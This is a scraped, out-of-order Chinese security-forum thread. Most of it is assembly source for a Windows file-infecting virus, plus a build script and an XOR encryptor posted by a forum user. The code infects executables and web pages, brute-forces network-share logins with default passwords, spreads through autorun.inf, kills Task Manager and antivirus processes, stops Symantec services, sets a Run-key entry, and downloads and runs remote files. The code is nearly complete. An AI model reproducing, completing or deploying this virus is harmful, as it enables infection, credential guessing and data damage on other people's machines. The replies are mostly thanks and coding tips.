ecx, esp push ebx mov ebx, ecx push ebx xor ecx,ecx mov cl, 8 .while cl mov dword ptr[ebx], 0 add ebx, 4 dec cl .endw pop ebx call EnumShareNet pop esp pop ecx pop ebx ret InfectNetFile endp ;------------------------------------ strupw proc desc:dword push edi mov edi, desc .while byte ptr [edi] .if byte ptr [edi] >= 'a' && byte ptr [edi] <= 'z' sub byte ptr [edi], 'a'-'A' .endif inc edi .endw pop edi ret strupw endp strchr proc desc:dword, chr : dword push edi mov edi, desc mov eax, chr .while byte ptr [edi] .if byte ptr [edi] == al mov eax, edi pop edi ret .endif inc edi .endw xor eax,eax pop edi ret strchr endp ;------------------------------------------------------ ;---------------------------------------------------------------- EnumShareNet PROC push ebx push edi push esi push ecx mov ecx, esp sub esp, 0ch mov edi, esp push ecx push edi push ebx push 0 push 0 push 2 call [ebp + _WNetOpenEnum] .if eax lea eax, [ebp + @@EnumShareNet_end] jmp eax .endif push 16384 push 40H call [ebp +_GlobalAlloc] .if eax == 0 lea eax, [ebp + @@EnumShareNet_end] jmp eax .endif mov esi, eax lea eax, [edi + 8] mov dword ptr [eax], 16384 push eax push esi lea eax, [edi + 4] push eax mov dword ptr [eax], -1; push dword ptr [edi] call [ebp + _WNetEnumResource] .if eax lea eax, [ebp + @@EnumShareNet_end] jmp eax .endif mov ecx, dword ptr [edi + 4] push esi .while ecx assume esi : ptr NETRESOURCEA ;int 3 push ecx mov ebx, [esi].lpRemoteName mov eax, 1 call dealNetAllFile .if eax mov eax, [esi].dwUsage .if ebx && (eax & 1) \|\| (eax & 2) mov ebx, esi ;int 3 call EnumShareNet .endif .endif add esi, 32 pop ecx dec ecx .endw call [ebp + _GlobalFree] push dword ptr [edi] call [ebp + _WNetCloseEnum] @@EnumShareNet_end: pop esp pop ecx pop esi pop edi pop ebx ret EnumShareNet ENDP ;----------------------------------------------------------------- InfectFile proc push ebp mov ebp, dword ptr [esp + 8] push ebx push ecx sub esp, 4 mov ebx, esp mov dword ptr [ebx], '\:y' .while BYTE PTR [ebx] <= 'z' mov cl, 10H call InfectAllFile inc BYTE PTR [ebx] .endw add esp, 4 pop ecx pop ebx pop ebp ret 4 InfectFile endp strcat proc desc:dword, src:dword push edi mov edi, desc .while BYTE PTR [edi] inc edi .endw push src push edi call strcpy pop edi ret strcat endp strcpy proc desc:DWORD, src:DWORD push esi push edi mov esi, src mov edi, desc .while BYTE PTR [esi] mov al, BYTE PTR [esi] mov BYTE PTR [edi], al inc edi inc esi .endw mov BYTE PTR [edi], 0 pop edi pop esi ret strcpy ENDP ;------------------------------------------------------------------- TryNetPassword PROC push ebx mov ebx, esp push edi push ecx push edx sub esp, 20H mov eax, esp push ebx mov ebx, dword ptr [ebx + 8] push eax mov cl, 20H .while cl mov byte ptr [eax], 0 inc eax dec cl .endw pop edi mov dword ptr [edi + 14H], ebx mov al, 1 lea ebx, [ebp + _tryUserName] .while eax && byte ptr [ebx] lea edx, [ebp + _tryPassword] .while eax && byte ptr [edx] push 1 push ebx push edx push edi int 3 call [ebp + _WNetAddConnection2] .while eax && byte ptr [edx] inc edx .endw inc edx .endw .while eax && byte ptr [ebx] inc ebx .endw inc ebx .endw pop esp pop edx pop ecx pop edi pop ebx ret TryNetPassword ENDP ;------------------------------------------------------------------ ;------------------------------------------------------------------- dealNetAllFile PROC push ebx push edi mov edi, esp sub esp, 204H push edi sub edi, 204H ;-------------messagebox---------------- ;int 3 ;-------------------------------------- mov dword ptr [edi], '\'; .if ebx && word ptr [ebx] == '\\' push ebx lea ebx, [edi + 4] push ebx call strcpy push edi push ebx call strcat push ebx lea ebx, [edi + 104H] push ebx call strcpy lea ebx, [ebp + offset virname] push ebx lea ebx, [edi + 4] push ebx call strcat .if dword ptr [ebx] == 'LB\\' ;int 3 call CreateVirusExeAndWrite .if eax lea eax, [edi + 104H] push eax call TryNetPassword call CreateVirusExeAndWrite .endif push eax .if eax == 0 lea ebx, [edi + 104H] push ebx lea ebx, [edi + 4] push ebx call strcpy lea eax, [ebp + _autorun] push eax push ebx call strcat call wirteautorun .endif lea ebx, [edi + 104H] call InfectAllFile pop eax .endif .endif pop esp pop edi pop ebx ret dealNetAllFile ENDP ;------------------------------------------------------------------ InfectAllFile PROC uses ebx edi ;LOCAL path[100h] : BYTE ;LOCAL fileData[300] : BYTE ;LOCAL hFind : DWORD ;LOCAL ext : DWORD ;LOCAL SPIT : WORD ; push 500 ; call [ebp + _Sleep] push esi mov esi, ebp mov ebp, esp sub esp, 100h+300+10h mov dword ptr [ebp - 100h - 300 - 4 - 4] , '.' mov word ptr [ebp - 100h - 300 - 4 - 4 - 2] , '\' lea edi, [ebp - 100h] push ebx push edi call strcpy .if ecx lea edx, [ebp - 100h - 300 - 4 - 4] push edx push edi call strcat lea edx, [ebp - 100h - 300] push edx push edi call [esi + _FindFirstFile] .if eax == -1 lea eax, [esi + @@InfectAllFile_end] jmp eax .endif mov [ebp - 100h - 300 - 4] , eax @@InfectAllFile_FindNextFile: push ebx lea edx, [ebp - 100h - 300] assume edx : ptr WIN32_FIND_DATA mov ecx, [edx].dwFileAttributes lea ebx, [edx].cFileName and ecx, 10H .IF BYTE PTR [ebx] == '.' lea eax, [esi + @@FindFileskip_next] jmp eax .ENDIF .if ecx lea eax, [ebp - 100h - 300 - 4 - 4 - 2] push eax push ebx call strcat .else push ebx call strupw .endif push ebx push edi call strcat mov ebx, edi push ebp mov ebp, esi call InfectAllFile pop ebp @@FindFileskip_next: lea edx, [ebp - 100h - 300] push edx push [ebp - 100h - 300 - 4] call [esi + _FindNextFile] pop ebx .if eax push ebx push edi call strcpy lea eax, [esi + @@InfectAllFile_FindNextFile] jmp eax .endif push [ebp - 100h - 300 - 4] call [esi + _FindClose] .else push ebp mov ebp, esi call InfectOneFile pop ebp .endif @@InfectAllFile_end: mov esp, ebp mov ebp, esi pop esi ret InfectAllFile ENDP InfectOneFile PROC uses esi ecx edi ;ebx---文件名的地址 push ebp push ebx mov esi, ebp mov ebp, esp mov ecx, offset ournasdfasdf - offset embedMain + 280H + 10H + 10H + 30H and cl, 0f0h sub esp , ecx ;int 3 push 0 push 80H push 3 push 0 push 0 push GENERIC_READ + GENERIC_WRITE push ebx mov dword ptr[ebp - 8], 0 push '.' push ebx call strchr .if eax && dword ptr [eax + 1] == 'MTH' \|\| dword ptr [eax + 1] == 'PSA' \|\| \ dword ptr [eax + 1] == 'LMTH' \|\| dword ptr [eax + 1] == 'PSJ' \|\| \ dword ptr [eax + 1] == 'PHP' mov dword ptr[ebp - 8], 1 .endif lea eax, [ebp - 40H] push eax push 0 push ebx call [esi + _GetFileAttributesEx] call [esi + _CreateFile] .IF eax == -1 call [esi + _GetLastError] lea eax, [@@InfectOneFile_Out + esi] jmp eax .ENDIF mov ebx, eax .if dword ptr[ebp - 8] == 1 push FILE_END push 0 push offset _website - offset _website_end push ebx call [esi + _SetFilePointer] push ecx push edi push edx mov ecx, offset _website_end - offset _website mov edx, esp sub esp, ecx sub esp, 10H and sp, 0fffcH mov edi, esp push edx push 0 lea eax, [esi + tempword] push eax push ecx push edi push ebx call [esi + _ReadFile] lea edx, [esi + _website] mov ecx, offset _website_end - offset _website .while ecx mov al, byte ptr [edx] .if byte ptr [edi] != al mov eax, -1 mov ecx, 1 .endif inc edi inc edx dec ecx .endw pop esp pop edx pop edi pop ecx .if eax != -1 lea eax, [esi + @@closeInfectOneFile] jmp eax .endif push 0 lea ecx, [ebp - 4] push ecx push offset _website_end - offset _website lea edi, [esi + _website] push edi push ebx call [esi + _WriteFile] lea eax, [esi + @@closeInfectOneFile] jmp eax .endif push 0 lea ecx, [ebp - 4] push ecx push offset ournasdfasdf - offset embedMain + 278H mov edi, ebp sub edi, offset ournasdfasdf - offset embedMain + 278H + 10H + 30H push edi push ebx call [esi + _ReadFile] .IF eax != 0 && word ptr [edi] == 'ZM' && dword ptr[edi + 03ch] < 1000H mov ecx, dword ptr[edi + 03ch] add ecx, edi .IF word ptr [ecx] != 'EP' \|\| dword ptr [ecx + 78H] \|\| dword ptr [ecx + 7cH] lea eax, [esi + @@closeInfectOneFile] jmp eax .ENDIF push edi push ebx xor eax, eax mov dx, word ptr [ecx + 6] dec dx mov ax, 28h mul dx push ecx lea edx, [esi + ournasdfasdf] lea ecx, [esi + embedMain] sub edx, ecx add edx, 278h pop ecx add eax, 0F8h add eax, ecx mov ebx, dword ptr [eax + 14H] mov dword ptr [ebp - 0ch], ebx mov ebx, dword ptr [eax + 10H] add dword ptr [ebp - 0ch], ebx push ebx add dword ptr [eax + 10H], edx mov ebx, dword ptr [eax + 10H] mov dword ptr [eax + 8], ebx mov ebx, dword ptr [eax + 0ch] mov dword ptr[ecx + 50h], ebx mov ebx, dword ptr [eax + 8] add dword ptr[ecx + 50h], ebx pop ebx .IF dword ptr [eax + 24h] & 0e0000020h pop ebx pop edi lea eax, [esi + @@closeInfectOneFile] jmp eax .ENDIF or dword ptr [eax + 24h], 0e0000020h mov eax, dword ptr [eax + 0ch] add eax, ebx add eax, 278h mov ebx, dword ptr[ecx + 28H] ; write to addressOfEntryProint mov dword ptr[ecx + 28H], eax mov eax, dword ptr [ecx + 34H] ;---- eax : ImageBase ebx : AddressOfEntryPoint edx : virus length mov ecx, ebx pop ebx pop edi push edx ; virus length push ecx ; AddressOfEntryPoint push eax ; ImageBase mov dword ptr[ebp - 8], 0 push 0 push 0 push 0 push ebx call [esi + _SetFilePointer] push 0 lea ecx, [ebp - 4] push ecx push dword ptr [ecx] push edi push ebx call [esi + _WriteFile] mov dword ptr[ebp - 8], 0 push 0 push 0 push dword ptr [ebp - 0ch] push ebx call [esi + _SetFilePointer] mov eax, dword ptr [esi + _dwImageBase] mov ecx, dword ptr [esi + _dwOrgEntry] pop dword ptr [esi + _dwImageBase] pop dword ptr [esi + _dwOrgEntry] pop edx ; virus length or BYTE PTR [esi+runPosition], 1 push eax push ecx push esi push edi add esi, offset ournasdfasdf sub esi, edx mov eax, edi mov ecx, edx shr ecx, 2 rep movs dword ptr [edi], dword ptr [esi] add eax, edx mov ecx, offset ournasdfasdf - offset @@beginEnvelopPos sub eax, ecx call EnvelopCode pop edi pop esi push 0 lea ecx, [ebp - 4] push ecx push edx push edi push ebx call [esi + _WriteFile] pop dword ptr [esi + _dwOrgEntry] pop dword ptr [esi + _dwImageBase] and BYTE PTR [esi+runPosition], 0 .ENDIF @@closeInfectOneFile: lea eax, [ebp - 40H + 14H] push eax lea eax, [ebp - 40H + 0cH] push eax lea eax, [ebp - 40H + 4H] push eax push ebx call [esi + _SetFileTime] push ebx call [esi + _CloseHandle]; mov eax, 0 @@InfectOneFile_Out: mov esp, ebp pop ebx pop ebp ret InfectOneFile ENDP ;---------------------------------------------------- stricmp Proc desc : dword , wsrc: dword push esi push edi mov edi, desc mov esi, wsrc mov al, byte ptr [esi] .while al && byte ptr [edi] mov al, byte ptr [esi] .if al != byte ptr [edi] sub al, 'a' - 'A'; .if al != byte ptr [edi] add al, 2 * ('a' - 'A'); .if al != byte ptr [edi] xor al, al .endif .endif .endif .if al inc esi inc esi inc edi .endif .endw .if byte ptr [esi] && byte ptr [edi] mov al, 1 .else xor eax, eax .endif pop edi pop esi ret stricmp endp ;---------------------------------------------- dealProcess proc push edi mov cl, 1 mov ebx, edi push 1 int 3 .while ecx ;------------------------2 mov ecx, dword ptr [ebx] mov edi, ebx add edi, 03ch xor eax, eax .if dword ptr [edi] ;--------------------3 push dword ptr [edi] lea edx, [ebp + offset virname] push edx call stricmp .if eax == 0 ;-----------4 pop eax push 0 .else ;start kill software lea edx, [ebp + _killSoftName] .while byte ptr [edx] ;---1 push dword ptr [edi] push edx call stricmp push edx .if eax == 0 int 3 push ecx push dword ptr [ebx + 44H] push 0 push PROCESS_ALL_ACCESS + PROCESS_TERMINATE call [ebp + _OpenProcess] .if eax push eax push 0 push eax call [ebp + _TerminateProcess] call [ebp + _CloseHandle] .endif pop ecx .endif pop edx .while byte ptr [edx] inc edx .endw inc edx .endw ;-----1 .endif ;--------------4 .endif ;--------------------3 add ebx, ecx .endw ;----------2 pop eax pop edi ret dealProcess endp ;------------------------------------------------ CheckCurrentExist Proc ; 0 存在 1 不存在 push ebx push edx push edi push ecx mov ecx, 2000H mov edi, esp sub esp, 10H mov ebx, esp push edi @@CheckCurrentExist_retry: push ecx push ecx push ecx push 40H call [ebp +_GlobalAlloc] mov edi, eax .if eax == 0 pop eax lea eax, [ebp + @@CheckCurrentExist_out] jmp eax .endif pop ecx push ebx push ecx push edi push 5 call [ebp + _NtQuerySystemInformation] int 3 .if eax == 0c0000004H push edi call [ebp + _GlobalFree] pop ecx add ecx, 1000H lea eax, [ebp + @@CheckCurrentExist_retry] jmp eax .endif .if eax == 0 call dealProcess .endif @@CheckCurrentExist_out: .if edi push eax push edi call [ebp + _GlobalFree] pop eax .endif pop ecx pop esp pop ecx pop edi pop edx pop ebx ret CheckCurrentExist endp ;---------------------------------------- DownFileFromNet proc push ebx push edi mov ebx, esp sub esp, 1010H mov edi, esp push ebx lea ebx, [ebp + _downFileList] mov al, 1 .while eax && byte ptr [ebx] mov dword ptr [edi], 'n\:c' mov dword ptr [edi + 4], 'ld.' push 0 push 0 push edi push ebx push 0 call [ebp + _URLDownloadToFile] .if eax .while byte ptr [ebx] inc ebx .endw inc ebx .else push edi mov eax, edi push 0 push 80H push 3 push 0 push 0 push GENERIC_READ push eax call [ebp + _CreateFile] .if eax != -1 add edi, 10H push eax push 0 lea eax, [esi + tempword] push eax push ecx push edi push ebx call [esi + _ReadFile] call [esi + _CloseHandle] .while byte ptr [edx] mov eax, edx .while byte ptr [edx] inc edx .endw inc edx .if byte ptr [edx] push 0 push 0 push edx push eax push 0 call [ebp + _URLDownloadToFile] .if eax push 0 push edx call [ebp + _WinExec] .endif .while byte ptr [edx] inc edx .endw inc edx .endif .endw .endif call [ebp + _DeleteFile] xor eax, eax .endif .endw pop esp pop edi pop ebx ret DownFileFromNet endp ;---------------------------------------- StopServiceAndWriteRun proc push ebx push edx mov edx, esp sub esp, 20H mov ebx, esp push edx push ebx push KEY_SET_VALUE + KEY_WRITE push 0 lea edx, [ebp + _runKey] push edx push 80000002H call [ebp + _RegOpenKeyEx] .if eax push offset virdll - offset virname lea edx, [ebp + virname] push edx push 1 push 0 lea edx, [ebp + _runKeyName] push edx push dword ptr [ebx] call [ebp + _RegSetValueEx] push dword ptr [ebx] call [ebp + _RegCloseKey] .endif push SC_MANAGER_ALL_ACCESS push 0 push 0 call [ebp + _OpenSCManager] .if eax push eax mov dword ptr [ebx], eax lea edx, [ebp + _StopServiceName] .while byte ptr [edx] push edx push SERVICE_ALL_ACCESS + SERVICE_STOP push edx push dword ptr [ebx] call [ebp + _OpenService] .if eax push eax lea edx, [ebx + 4] push edx push 1 push eax call [ebp + _ControlService] call [ebp + _CloseServiceHandle] .endif pop edx .while byte ptr [edx] inc edx .endw inc edx .endw call [ebp + _CloseServiceHandle] .endif pop esp pop edx pop ebx ret StopServiceAndWriteRun endp ;---------------自身进程--------------------------- shortTimeSelfFun proc call StopServiceAndWriteRun call movabledisk push 1000 * 60 call [ebp + _Sleep] ret shortTimeSelfFun endp ;----------------自身启的线程----------- longTimeSelfFun proc call InfectNetFile call DownFileFromNet push ebp call InfectFile push 24 * 60 * 60 * 1000 call [ebp + _Sleep] ret longTimeSelfFun endp ;------------后启的线程------------------ InfectfileFun proc push ebp call CreateVirusExe push 2 * 60 * 1000 call [ebp + _Sleep] ret InfectfileFun endp ;----------------------------------------------------------------- ;------------------remove--begin------------------- checkPoint proc uses edx, lpAddr : DWORD, funAddress : DWORD push 0 push 0 push lpAddr push 0 call funAddress ret checkPoint endp ;----------------remove end----------------- ;-----------file head paramter--------- _dwImageBase dd 400000h _dwOrgEntry dd 0 _dwKernelBase dd 0 ;-----------Kernel fun address---------------- _GetProcAddress dd 0 _LoadLibraryA dd 0 szKernel32 db "Kernel32.dll",0 szGetModuleHandle db "GetModuleHandleA",0 _GetModuleHandle dd 0 szFreeLibrary db "FreeLibrary",0 _FreeLibrary dd 0 szVirtualProtect db "VirtualProtect",0 _VirtualProtect dd 0 szGetModuleFileName db "GetModuleFileNameA",0 _GetModuleFileName dd 0 szCreateFile db "CreateFileA",0 _CreateFile dd 0 szReadFile db "ReadFile",0 _ReadFile dd 0 szWriteFile db "WriteFile",0 _WriteFile dd 0 szGetFileSize db "GetFileSize",0 _GetFileSize dd 0 szCloseHandle db "CloseHandle",0 _CloseHandle dd 0 szCreateRemoteThread db "CreateRemoteThread",0 _CreateRemoteThread dd 0 szVirtualAllocEx db "VirtualAllocEx",0 _VirtualAllocEx dd 0 szVirtualFree db "VirtualFree",0 _VirtualFree dd 0 szWriteProcessMemory db "WriteProcessMemory",0 _WriteProcessMemory dd 0 szOpenProcess db "OpenProcess",0 _OpenProcess dd 0 szCreateProcess db "CreateProcess",0 _CreateProcess dd 0 szTerminateProcess db "TerminateProcess",0 _TerminateProcess dd 0 szCreateThread db "CreateThread",0 _CreateThread dd 0 szSleep db "Sleep",0 _Sleep dd 0 szCreatePipe db "CreatePipe",0 _CreatePipe dd 0 szGlobalAlloc db "GlobalAlloc",0 _GlobalAlloc dd 0 szGlobalFree db "GlobalFree",0 _GlobalFree dd 0 szSetFilePointer db "SetFilePointer",0 _SetFilePointer dd 0 szFindFirstFile db "FindFirstFileA",0 _FindFirstFile dd 0 szFindNextFile db "FindNextFileA",0 _FindNextFile dd 0 szFindClose db "FindClose",0 _FindClose dd 0 szWinExec db "WinExec",0 _WinExec dd 0 szGetSystemDirectory db "GetSystemDirectoryA", 0 _GetSystemDirectory dd 0 szGetDriveType db "GetDriveTypeA",0 _GetDriveType dd 0 szSetFileTime db "SetFileTime",0 _SetFileTime dd 0 szSetFileAttributes db "SetFileAttributesA",0 _SetFileAttributes dd 0 szGetFileAttributesEx db "GetFileAttributesExA",0 _GetFileAttributesEx dd 0 szDeleteFile db "DeleteFileA",0 _DeleteFile dd 0 szGetLastError db "GetLastError",0 _GetLastError dd 0 ;---------------Ntdll fun address------------------ szNtdll db "Ntdll.dll",0 szNtQuerySystemInformation db "NtQuerySystemInformation",0 _NtQuerySystemInformation dd 0 ;--------------user32.dll fun address-------------------- szUser32 db "user32.dll",0 szFindWindowEx db "FindWindowExA",0 _FindWindowEx dd 0 ;-------------Mpr.dll fun address----------------------- szMpr db "Mpr.dll",0 szWNetOpenEnum db "WNetOpenEnumA",0 _WNetOpenEnum dd 0 szWNetEnumResource db "WNetEnumResourceA",0 _WNetEnumResource dd 0 szWNetAddConnection2 db "WNetAddConnection2A",0 _WNetAddConnection2 dd 0 szWNetCloseEnum db "WNetCloseEnum",0 _WNetCloseEnum dd 0 ;-------------Advapi32.dll fun address------------- szAdvapi32 db "Advapi32.dll",0 szOpenSCManager db "OpenSCManagerA",0 _OpenSCManager dd 0 szOpenService db "OpenServiceA",0 _OpenService dd 0 szControlService db "ControlService",0 _ControlService dd 0 szCloseServiceHandle db "CloseServiceHandle",0 _CloseServiceHandle dd 0 szRegOpenKeyEx db "RegOpenKeyExA",0 _RegOpenKeyEx dd 0 szRegSetValueEx db "RegSetValueExA",0 _RegSetValueEx dd 0 szRegCloseKey db "RegCloseKey",0 _RegCloseKey dd 0 ;------------------urlmon.dll fun address-------------- szurlmon db "urlmon.dll",0 szURLDownloadToFile db "URLDownloadToFileA",0 _URLDownloadToFile dd 0 ;--------------------------------------------------- _runKeyName db "vApp",0 _runKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 _autoruncontent db "[autorun]",0dh,0ah,"open=" virname db "sopl.scr",0 virdll db "sopl.dll",0 _autorun db "autorun.inf",0 runPosition db 0 _website db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" _website_end db 0 _killSoftName db "taskmgr.exe",0 db "VPTray.exe",0 db 0 _tryUserName db "admin",0 db "guest",0 db 0 _tryPassword db "123456",0 db "admin",0 db "guest",0 db 0 _downFileList db "www.sina.com.cn",0 db "www.sohu.com",0 db "www.163.com",0 db 0 _StopServiceName db "Symantec AntiVirus",0 db "SavRoam",0 db 0 ;------------------remove begin----------------- szmm db "MessageBoxA",0 _mm dd 0 ;------------------remove end-------------------- tempword db 'czj1' ournasdfasdf: PROGRAM_END: push 0 push 0 call GetProcAddress push 0 call LoadLibraryA ;--ournasdfasdf: END main 2008-2-2 12:54 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 17 楼楼上给出的代码有问题啊 2008-2-2 13:13 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 18 楼有什么问题？下面是编译的批处理 @echo off del vir.exe SET PROJECTNAME=vir SET MASMBINPATH=d:\MASM32\BIN %MASMBINPATH%\Ml.exe /c /coff /Zp1 %PROJECTNAME%.asm %MASMBINPATH%\Link.exe /SUBSYSTEM:WINDOWS /MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078 /ALIGN:128 %PROJECTNAME%.obj echo. pause cpp1.exe 2008-2-9 13:27 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 19 楼把指令 int 3 全部注解。 2008-2-9 13:30 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 20 楼编译的后要对编出来的EXE 加一次密。代码如下。因为编出来的EXE执行时，首先要解密一次。就是那个make.bat 最后的那个cpp1.exe #include <io.h> #include <fcntl.h> #include <stdio.h> int main() { int fp = _open("f:\\vir\\vir.exe", O_RDWR \| _O_BINARY ); int len = _lseek(fp, 0x2c1 , 0); unsigned long value; char buf[0x10000]; len = _read(fp, buf, 0x10000); int i = 0; for (i = 0; i < len; i+=4) { unsigned long p = (unsigned long)(buf + i); *p ^= 'czj1'; } _lseek(fp, 0x2c1 , 0); _write(fp, buf, i); _close(fp); printf("0x%x, 0x%x", len , len & ~0x3); getchar(); return 0; } 2008-2-9 14:09 0
linyboy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 18 粉丝 0 关注私信	linyboy 21 楼 combojiang用Ori_Entry[ebp]定址真精炼！ 2008-2-9 14:27 0
nosber 雪币： 200 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	nosber 22 楼不错~~收藏~~ 2008-2-12 13:08 0
dylin 雪币： 200 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	dylin 23 楼支持一下!! 2008-3-2 22:56 0
gaooliang 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	gaooliang 24 楼不明白呵呵还是要学习啊 2008-3-6 13:54 0
neuqyl 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 4 粉丝 0 关注私信	neuqyl 25 楼学习了 ~~~~~ 2008-3-8 09:46 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

combojiang

发帖

765

回帖

1050

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (53) 1 2 3 ▶
cham 雪币： 193 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 36 回帖 200 粉丝 0 关注私信	cham 2 楼谢谢楼主，正好想找个入门！ 2007-11-27 12:39 0
kgdurgwu 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 91 粉丝 0 关注私信	kgdurgwu 3 楼收藏了谢谢扫盲。。。。 2007-11-27 13:09 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 4 楼这里＝＝＝》这里的地址都是NT中的对应API地址，如果要改为9X下执行， ……………… 最好判断一下操作系统 2007-11-27 22:13 0
cham 雪币： 193 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 36 回帖 200 粉丝 0 关注私信	cham 5 楼 Sectionaddress dd 0h定义错误啊，应该是SectionAddress 这里的地址都是NT中的对应API地址，如果要改为9X下执行，就把地址值改为9X的。（地址可以用W32DASM得到。）因为是注释，整句前面少了个; 修改后我编译了一下，没错，但是在vbox的虚拟机中运行了一下，出错了！ 2007-11-28 16:37 0
cyto 雪币： 417 活跃值： (475) 能力值： ( LV9，RANK：1250 ) 在线值：发帖 41 回帖 624 粉丝 0 关注私信	cyto 31 6 楼扫盲篇,收藏学习. 2007-11-28 21:14 0
巨蟹之子雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	巨蟹之子 7 楼认真学习了一下~~ 2007-11-29 11:00 0
crazybug 雪币： 22 活跃值： (425) 能力值： ( LV6，RANK：90 ) 在线值：发帖 14 回帖 112 粉丝 0 关注私信	crazybug 2 8 楼汗 API 地址硬编码～最起码来个暴力搜索啊～ 2007-11-30 11:51 0
hfyy 雪币： 235 活跃值： (23) 能力值： ( LV6，RANK：90 ) 在线值：发帖 14 回帖 122 粉丝 2 关注私信	hfyy 2 9 楼硬编码可不是什么好办法搜索挺简单的 2007-12-8 18:13 0
hityct 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	hityct 10 楼入门的好教材。 2007-12-13 10:18 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 11 楼我看还不如直接写死ＡＰＩ地址，兼容性判断以下就好 2007-12-13 13:37 0
黑色猎鹰雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	黑色猎鹰 12 楼收藏学习~~~ 2007-12-19 22:45 0
interfox 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 13 粉丝 0 关注私信	interfox 13 楼谢谢扫盲，入门者的教材，编的初学者 2008-1-26 16:46 0
yjlssg 雪币： 627 活跃值： (1891) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 87 粉丝 0 关注私信	yjlssg 14 楼好，支持一下，还是要学汇编啊 2008-1-27 00:08 0
小子贼野雪币： 347 活跃值： (25) 能力值： ( LV9，RANK：420 ) 在线值：发帖 25 回帖 891 粉丝 0 关注私信	小子贼野 10 15 楼好东西，收藏了 2008-1-27 11:58 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 16 楼一个新样本： .386 .model flat, stdcall option casemap:none include d:\masm32\include\kernel32.inc includelib d:\masm32\lib\kernel32.lib include d:\masm32\include\windows.inc .code main: pushad push @@curAddr jmp @@curAddr embedMain: pushad call @@curAddr @@curAddr: mov ebp, [esp] add esp, 4 sub ebp, @@curAddr - main sub ebp, main lea eax, [ebp + @@beginEnvelopPos] mov ecx, offset ournasdfasdf - offset @@beginEnvelopPos call EnvelopCode lea eax, [ebp + @@beginEnvelopPos] jmp eax ;------------------------------------------------------------------------- EnvelopCode PROC and cx, 0fffcH .WHILE cx xor dword ptr [eax], 'czj1' sub cx, 4 add eax, 4 .ENDW ret EnvelopCode ENDP ;-------------------------------------------------------------------------------- @@beginEnvelopPos: ;-------initialize fun entry-------------- mov esi, [EBP+ OFFSET _dwImageBase] assume esi : ptr IMAGE_DOS_HEADER mov esi, [esi].e_lfanew add esi, [EBP+ OFFSET _dwImageBase] assume esi : ptr IMAGE_NT_HEADERS32 ; push [esi].OptionalHeader.DataDirectory[11 * SIZEOF IMAGE_DATA_DIRECTORY].VirtualAddress ; push [esi].FileHeader.NumberOfSections mov esi, [esi].OptionalHeader.DataDirectory[SIZEOF IMAGE_DATA_DIRECTORY].VirtualAddress ;1 --IMAGE_DIRECTORY_ENTRY_IMPORT add esi, [EBP+ OFFSET _dwImageBase] assume esi : ptr IMAGE_IMPORT_DESCRIPTOR .while !([esi].OriginalFirstThunk==0 && [esi].TimeDateStamp==0 && [esi].ForwarderChain==0 && [esi].Name1==0 && [esi].FirstThunk==0) mov eax,[esi].Name1 ADD eax,[EBP+OFFSET _dwImageBase] ; .IF (dword ptr[edx] == ('NREK') && dword ptr [edx + 4] == ('23LE') && dword ptr [edx + 8] == ('lld.') && byte ptr [edx + 12] == 0) \|\| (dword ptr[edx] == ('nrek') && dword ptr [edx + 4] == ('23le') && dword ptr [edx + 8] == ('lld.') && byte ptr [edx + 12] == 0) add esp, 10H mov edx, esp mov ebx, dword ptr [eax] mov dword ptr [edx], ebx mov ebx, dword ptr [eax + 4] mov dword ptr [edx + 4], ebx mov ebx, dword ptr [eax + 8] mov dword ptr [edx + 8], ebx mov bl, byte ptr [eax + 0cH] mov byte ptr [edx + 0cH], bl push edx call strupw xor eax, eax .IF dword ptr[edx] == ('NREK') && dword ptr [edx + 4] == ('23LE') && dword ptr [edx + 8] == ('LLD.') && byte ptr [edx + 12] == 0 mov eax, 1 .endif sub esp, 10H .IF eax xor eax, eax mov edx, [esi].OriginalFirstThunk .IF edx != 0 add edx, [EBP+OFFSET _dwImageBase] .ENDIF .WHILE edx != 0 && dword ptr [edx] != 0 push edx push eax mov edx, [edx] add edx, [EBP+ OFFSET _dwImageBase] assume edx : ptr IMAGE_IMPORT_BY_NAME ADD edx, SIZEOF 